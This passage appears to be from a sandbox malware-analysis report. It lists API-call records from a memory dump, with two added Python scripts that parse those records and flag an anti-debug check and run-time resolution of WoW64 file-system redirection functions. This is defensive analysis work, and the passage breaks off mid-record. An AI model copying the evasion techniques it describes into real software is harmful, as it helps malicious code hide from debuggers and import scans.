                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseErrorHandleMode
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3953868439-0
                                                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                        • Instruction ID: c73f70254a293bbcdb29b7fecc970ba75d5bc83f5169d32052d40430061d9c9f
                                                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                        • Instruction Fuzzy Hash: 9431F578A12106DFC758EF58C4D0A69FBA1FB59300B2486A5E409CB692D772EDE5CBC0
                                                                                                                                                                        APIs
                                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00263A3C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconNotifyShell_
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1144537725-0
                                                                                                                                                                        • Opcode ID: db3a1b16e47d61c7ef88748dbc068792ef7e80ba2bb48ff236fc37553a7b341f
                                                                                                                                                                        • Instruction ID: e145a5317723b45365c6bd6ae5beb4f2ead01d598c7743119ee11a8466ea10db
                                                                                                                                                                        • Opcode Fuzzy Hash: db3a1b16e47d61c7ef88748dbc068792ef7e80ba2bb48ff236fc37553a7b341f
                                                                                                                                                                        • Instruction Fuzzy Hash: 5431A271615701CFD321DF24D884797BBE8FB49318F00092EE5DA87251E7B5AA98CF92
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsThemeActive.UXTHEME ref: 0026333D
                                                                                                                                                                          • Part of subcall function 002632E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002632FB
                                                                                                                                                                          • Part of subcall function 002632E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00263312
                                                                                                                                                                          • Part of subcall function 0026338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00263368,?), ref: 002633BB
                                                                                                                                                                          • Part of subcall function 0026338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00263368,?), ref: 002633CE
                                                                                                                                                                          • Part of subcall function 0026338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00332418,00332400,?,?,?,?,?,?,00263368,?), ref: 0026343A
                                                                                                                                                                          • Part of subcall function 0026338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00332418,?,?,?,?,?,?,?,00263368,?), ref: 002634BB
                                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00263377
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1550534281-0
                                                                                                                                                                        • Opcode ID: 8439eecf64713ce06310fcde1c9eb5972445cb69a1053f54f6a66f2e0576b66b
                                                                                                                                                                        • Instruction ID: 882c95556d683f3eef3d9822196023351bafbbacc41b317447f627f992bb6ba7
                                                                                                                                                                        • Opcode Fuzzy Hash: 8439eecf64713ce06310fcde1c9eb5972445cb69a1053f54f6a66f2e0576b66b
                                                                                                                                                                        • Instruction Fuzzy Hash: B8F05E755647449FE303AF70FD8BB663798A701729F104819B6098A1E2CBBA85B4CF80
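The API lists in these function records are the part an analyst actually reads: the record above shows an IsDebuggerPresent check buried in the subcall at 002633CE, and a later record on this page shows LoadLibraryA/GetProcAddress being used to resolve Wow64DisableWow64FsRedirection at run time instead of importing it. The Python script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses record lines in the form printed here (bullet, optional "Part of subcall function X:" prefix, API.MODULE(args), "ref: address") and surfaces the calls that deserve a closer look. The sample input is copied from records on this page; the watch-list of API names is the author's own assumption, not something the report defines.

```python
"""Parse Joe Sandbox function-record "APIs" lines and flag calls worth triage.

Added example; not part of the Joe Sandbox report. SAMPLE is copied from
API lists printed on this page. WATCHLIST is an assumption (the author's own
choice of APIs to surface), not something the report defines.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample input: lines taken from records on this page
# (the function at 0026333D and the LoadLibraryA/GetProcAddress subcalls
# of 0026663E).
SAMPLE = """\
• IsThemeActive.UXTHEME ref: 0026333D
  • Part of subcall function 002632E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 002632FB
  • Part of subcall function 0026338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00263368,?), ref: 002633CE
  • Part of subcall function 0026338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00332418,00332400,?,?,?,?,?,?,00263368,?), ref: 0026343A
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00263377
  • Part of subcall function 0026663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026664A
  • Part of subcall function 0026663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0026665C
"""

# One record line: optional bullet, optional "Part of subcall function X:" prefix,
# API.MODULE, optional "(args)", then "ref: <call-site address>".
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>[\w.]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumption: APIs an analyst wants pulled out of an otherwise unremarkable list.
WATCHLIST = {
    "IsDebuggerPresent": "anti-debug check",
    "Wow64DisableWow64FsRedirection": "WoW64 file-system redirection bypass",
    "Wow64RevertWow64FsRedirection": "WoW64 file-system redirection bypass",
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                      # address of the call site in the dump
    args: List[str] = field(default_factory=list)
    caller: Optional[str] = None  # set for "Part of subcall function" lines

    @property
    def literal_args(self) -> List[str]:
        """Arguments the plugin could resolve to a constant ('?' means unknown)."""
        return [a for a in self.args if a != "?"]


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn a record's API list into ApiCall objects; lines that are not API entries are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(m.group("api"), m.group("module"), m.group("ref"),
                             args, m.group("caller")))
    return calls


def triage(calls: List[ApiCall]) -> List[Tuple[str, str, str]]:
    """Return (call-site address, API name, reason) for every watch-listed call.

    A GetProcAddress whose second argument is a watch-listed name is reported
    under that name: the record shows the import being resolved dynamically,
    which is the case where a static import scan would miss it.
    """
    findings = []
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] in WATCHLIST:
            findings.append((c.ref, c.args[1],
                             "resolved via GetProcAddress: " + WATCHLIST[c.args[1]]))
        elif c.api in WATCHLIST:
            findings.append((c.ref, c.api, WATCHLIST[c.api]))
    return findings


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for call in parsed:
        where = f" (subcall of {call.caller})" if call.caller else ""
        print(f"{call.ref}: {call.api}.{call.module}{where} literal args={call.literal_args}")
    for ref, name, reason in triage(parsed):
        print(f"TRIAGE {ref}: {name}: {reason}")
```

Feed it the API lines of any record on this page; lines such as "Memory Dump Source" or "Source File: ..." do not match the pattern and are ignored, so a whole record can be pasted in unedited.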
                                                                                                                                                                        APIs
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0026CEEE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1385522511-0
                                                                                                                                                                        • Opcode ID: ff6ba7e56e0995dbc0f84303d308a83ca36fae80320b3e6bfd92d0d49dd62232
                                                                                                                                                                        • Instruction ID: 973f63a78962985b2d5f9e26faf9fdca30dd056a7e63dbbde8650acc5ad19fab
                                                                                                                                                                        • Opcode Fuzzy Hash: ff6ba7e56e0995dbc0f84303d308a83ca36fae80320b3e6bfd92d0d49dd62232
                                                                                                                                                                        • Instruction Fuzzy Hash: 24320374A20206DFCB20EF54C894ABEB7B9FF45350F64806AE945AB251C774EDA1CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LoadString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2948472770-0
                                                                                                                                                                        • Opcode ID: 80623baa9b757b0c51d9b1b8ed8ee80d10a13242ebb0a6a1eaf08ce2b691249d
                                                                                                                                                                        • Instruction ID: 7597fdf8a0800d8ff015ad73465969cb465f2535e0203c6e1936607565e4e321
                                                                                                                                                                        • Opcode Fuzzy Hash: 80623baa9b757b0c51d9b1b8ed8ee80d10a13242ebb0a6a1eaf08ce2b691249d
                                                                                                                                                                        • Instruction Fuzzy Hash: E1D18E34A2424AEFCF14EF95C8819ADBBB5FF08310F54415AE915AB391DB30ADA1CF90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: bb1d281c633ea5df2bdeb3f913de2d5345f508acbbe8f146937272fda3871f05
                                                                                                                                                                        • Instruction ID: 303913903d26b5a40327205368559963343da83e5c76015b6bc68ef883149f4b
                                                                                                                                                                        • Opcode Fuzzy Hash: bb1d281c633ea5df2bdeb3f913de2d5345f508acbbe8f146937272fda3871f05
                                                                                                                                                                        • Instruction Fuzzy Hash: 94513839A21104AFDB50EF68C940FA97BA5EF85324F19C168EC089B3D5D771ED62CB90
                                                                                                                                                                        APIs
                                                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 002CFCCE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                         • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                         • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BuffCharLower
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2358735015-0
                                                                                                                                                                        • Opcode ID: ffde10ca3bc7a9ef85674bbaa1480663bb2e0132fe6e2feb14d26b237e070762
                                                                                                                                                                        • Instruction ID: 1d052fd2aa72f9194c93ce469e4a43e8c21db72158dfa4eb0337caa5b99c13bf
                                                                                                                                                                        • Opcode Fuzzy Hash: ffde10ca3bc7a9ef85674bbaa1480663bb2e0132fe6e2feb14d26b237e070762
                                                                                                                                                                        • Instruction Fuzzy Hash: 6441287661020AAFCB51EF68C880EAEB3B9EF44310B21863EE507D7250EB70DE54CB50
APIs
  • Part of subcall function 0026663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026664A
  • Part of subcall function 0026663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0026665C
  • Part of subcall function 0026663E: FreeLibrary.KERNEL32(00000000,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002662FA,?,00000001,?,?,00000000), ref: 002666AB
  • Part of subcall function 00266607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266610
  • Part of subcall function 00266607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00266622
  • Part of subcall function 00266607: FreeLibrary.KERNEL32(00000000,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266635
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
• Opcode ID: 093611a54231154f3f68a2de8b6b81000272da6a262270fbd09743291301a8e0
• Instruction ID: 9938881817abf5c6e132b728b31155c3371fa320130260a6e20772835ba9f974
• Opcode Fuzzy Hash: 093611a54231154f3f68a2de8b6b81000272da6a262270fbd09743291301a8e0
• Instruction Fuzzy Hash: 1C112731620205ABCF10BF70D90ABAD77A99F40710F10442DF442A71C2DEB5DAA4DF90
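The function above is worth a second look: it resolves Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection by name through GetProcAddress (so neither export shows up in the import table), and between those two calls it issues LoadLibraryExW with dwFlags 0x00000002, which is LOAD_LIBRARY_AS_DATAFILE in the Win32 SDK. In a 32-bit process such as this one (image mapped at 0x260000) that window sees the native System32 directory instead of SysWOW64. The script below is an added example, not part of the Joe Sandbox report or the sample: it parses the "APIs" block exactly as printed on this page (the sample text is copied from the listing above and embedded as a constructed input), decodes the LoadLibraryEx flag bits, lists every export fetched by name, and reports which top-level calls fall inside the redirection-disabled window. The order it relies on is the code-layout order Joe Sandbox prints, not a runtime trace, so treat the window as a static hint to confirm against the dump or a live trace; the IMAGE_BASE constant is taken from the "Offset: 00260000" line and is used to turn call-site addresses into offsets inside the downloadable .sdmp image.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: the "APIs" entries of one function from the listing
# above (process 0xB, image mapped at 0x260000), copied verbatim.
SAMPLE_BLOCK = """\
APIs
  • Part of subcall function 0026663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026664A
  • Part of subcall function 0026663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0026665C
  • Part of subcall function 0026663E: FreeLibrary.KERNEL32(00000000,?,?,0026668B,?,?,002662FA,?,00000001,?,?,00000000), ref: 0026666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,002662FA,?,00000001,?,?,00000000), ref: 002666AB
  • Part of subcall function 00266607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266610
  • Part of subcall function 00266607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00266622
  • Part of subcall function 00266607: FreeLibrary.KERNEL32(00000000,?,?,002A5657,?,?,002662FA,?,00000001,?,?,00000000), ref: 00266635
"""
IMAGE_BASE = 0x260000  # "Offset: 00260000" from the Memory Dump Source lines

# "• Api.MODULE(args), ref: ADDR", optionally prefixed by the
# "Part of subcall function ADDR:" marker Joe Sandbox uses for callees.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")

# LoadLibraryEx dwFlags bits as defined in the Win32 SDK (libloaderapi.h).
LOAD_LIBRARY_FLAGS = {
    0x0001: "DONT_RESOLVE_DLL_REFERENCES", 0x0002: "LOAD_LIBRARY_AS_DATAFILE",
    0x0008: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x0010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x0020: "LOAD_LIBRARY_AS_IMAGE_RESOURCE", 0x0040: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x0800: "LOAD_LIBRARY_SEARCH_SYSTEM32", 0x1000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]         # "?" marks an argument the tracer did not recover
    ref: int                # virtual address of the call site
    subcall: Optional[int]  # callee address when the call sits in a subfunction

    @property
    def rva(self) -> int:
        """Offset of the call site inside the dumped image (the .sdmp file)."""
        return self.ref - IMAGE_BASE

def parse_api_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:  # header lines such as "APIs" do not match and are skipped
            calls.append(ApiCall(m["api"], m["mod"],
                                 [a.strip() for a in m["args"].split(",")],
                                 int(m["ref"], 16),
                                 int(m["sub"], 16) if m["sub"] else None))
    return calls

def resolved_by_name(calls: List[ApiCall]) -> List[str]:
    """Exports fetched via GetProcAddress; these never appear in the import table."""
    return [c.args[1] for c in calls if c.api == "GetProcAddress" and len(c.args) > 1]

def decode_loadlibraryex_flags(calls: List[ApiCall]) -> Dict[int, List[str]]:
    """Call site -> dwFlags names for every LoadLibraryEx* call whose 3rd arg is known."""
    out = {}
    for c in calls:
        if c.api.startswith("LoadLibraryEx") and len(c.args) > 2 and c.args[2] != "?":
            flags = int(c.args[2], 16)
            names = [n for bit, n in LOAD_LIBRARY_FLAGS.items() if flags & bit]
            unknown = flags & ~sum(LOAD_LIBRARY_FLAGS)
            if unknown:
                names.append(f"UNKNOWN_0x{unknown:X}")
            out[c.ref] = names
    return out

def wow64_redirection_window(calls: List[ApiCall]) -> Optional[List[str]]:
    """Top-level APIs listed between resolving the Disable and Revert exports.

    In a 32-bit process those calls see the real System32 instead of SysWOW64.
    Returns None unless both exports are resolved, Disable first.
    """
    names = [c.args[1] if c.api == "GetProcAddress" and len(c.args) > 1 else None
             for c in calls]
    try:
        start = names.index("Wow64DisableWow64FsRedirection")
        end = names.index("Wow64RevertWow64FsRedirection", start + 1)
    except ValueError:
        return None
    return [c.api for c in calls[start + 1:end] if c.subcall is None]

if __name__ == "__main__":
    calls = parse_api_block(SAMPLE_BLOCK)
    for c in calls:
        print(f"{c.ref:08X} rva={c.rva:#06x} {c.api}")
    print(resolved_by_name(calls), decode_loadlibraryex_flags(calls),
          wow64_redirection_window(calls))
```

Pointing the parser at the other "APIs" blocks on this page works the same way; only the redirection-window check is specific to this function, and the flag decoder reports any bit it does not know as UNKNOWN rather than silently dropping it.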
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: e663b186c268a8d6b84ff266e67313f479e4507528519287708f2b5bcb5dca97
• Instruction ID: 204c3616e1493832eb46cbe60852251da0107cedad74ce0fd5e1bb9432b96d47
• Opcode Fuzzy Hash: e663b186c268a8d6b84ff266e67313f479e4507528519287708f2b5bcb5dca97
• Instruction Fuzzy Hash: 5011487690410AAFCF05DF98E940DDA7BF8EF49300F154069F809AB311DA31EA218B64
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
• Instruction ID: 0f1b123d023b746b3de07911e8ff54e0f221ef92cbece801b3ee720e68946e6b
• Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
• Instruction Fuzzy Hash: C2F02D3A53262096DE313A36DC01B6A33988F43334F150716F525931D1EBF4F8258BD2
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 002DF987
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: EnvironmentVariable
• String ID:
• API String ID: 1431749950-0
• Opcode ID: b71db7080cdb8f117ddbab18a0b947ada67b1388902df1efbd986258a06c80e7
• Instruction ID: cc8590c20cb538f871028da7a64e47c48fdf8d81285dc43a9ba3d1df51a643b5
• Opcode Fuzzy Hash: b71db7080cdb8f117ddbab18a0b947ada67b1388902df1efbd986258a06c80e7
• Instruction Fuzzy Hash: 02F08176610104BFCB01FBA5DC8AD9E77B8EF45720F000055F9059B361DA70ED54CB50
APIs
• RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0029319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00295031
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 83d1d1c9bea70b495d576321506727bd8a103ede7ed9fe8201f32142faea3457
• Instruction ID: 0b96c97464165ba33d131ad017a92d13f6471d25dd8beba54d2c96d851abcb0c
• Opcode Fuzzy Hash: 83d1d1c9bea70b495d576321506727bd8a103ede7ed9fe8201f32142faea3457
• Instruction Fuzzy Hash: 4EF0B436775E35A6DF333F269C05B6B3748AF457F0F148121B81897090EA70D8218BE0
APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
Memory Dump Source
• Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
• Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_260000_Hc.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: e67a55b698f4d2c64db298dbda2a9bcfb7b9c353197ea086a47cdac3827b4fee
